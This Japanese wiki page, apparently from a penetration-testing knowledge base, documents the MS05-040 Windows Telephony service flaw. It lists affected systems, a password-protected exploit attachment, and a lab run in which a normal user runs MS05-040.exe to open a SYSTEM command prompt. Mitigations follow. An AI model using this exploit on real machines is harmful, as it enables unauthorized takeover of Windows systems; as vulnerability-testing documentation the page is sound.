[[exploit:local:windows:ms05-040]]
 
トレース: » Cacti Users プラグインのインストール » Linux >= 2.6.13 prctl kernel Local Root Exploit » MS06-049:Windows カーネルの脆弱性により、特権が昇格される » Cisco製品のパスワード初期化 » NOKIA IPシリーズの初期化 » Snort 2.4.x インストール » 更新履歴 » PHP 5.1.x インストール - Apache 2.2.x + MySQL 5.0.x » MS06-055:Vector Markup Language の脆弱性により、リモートでコードが実行される » MS05-040:テレフォニーサービスの脆弱性により、リモートでコードが実行される
目次

MS05-040:テレフォニーサービスの脆弱性により、リモートでコードが実行される

更新履歴

  • 2006/03/15 参考URL CVE追加, 検証環境 Windows 2000 Advanced Server SP4日本語版 追加
  • 2006/03/15 初版

概要

  • 本手順のExploitはローカルでの攻撃コードである
  • テレフォニーサービスの脆弱性により、特権の昇格が可能

影響を受けるシステム

  • Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1
  • Microsoft Windows Server 2003 for Itanium-based Systems および Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
  • Microsoft Windows Server 2003 x64 Edition
  • Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME)

添付ファイル

files password
ms05-040.zip pen-test

参考URL

Exploitの検証

検証環境

  • Windows2000 Server SP4 日本語版
  • Windows2000 Advanced Server SP4 日本語版

検証結果

  • 一般ユーザでログイン後、以下コマンドを実行する。
C:\>whoami
VM-W2K\user01

C:\>MS05-040.exe "cmd.exe"
  • 別ウインドウでシステム権限のコマンドプロンプトが起動する。
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>

対処方法

  1. MS05-040 パッチの適用 (Windows Update の実施)
  2. Telephonyサービスの停止
  3. ユーザの厳格な管理
    • 不要なユーザを作成しない

デモンストレーション

  • Usersグループのユーザ「user01」を Administratorsグループ に所属させる。

 
exploit/local/windows/ms05-040.txt · 最終更新: 2007/10/16 12:02
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki NINJA TOOLS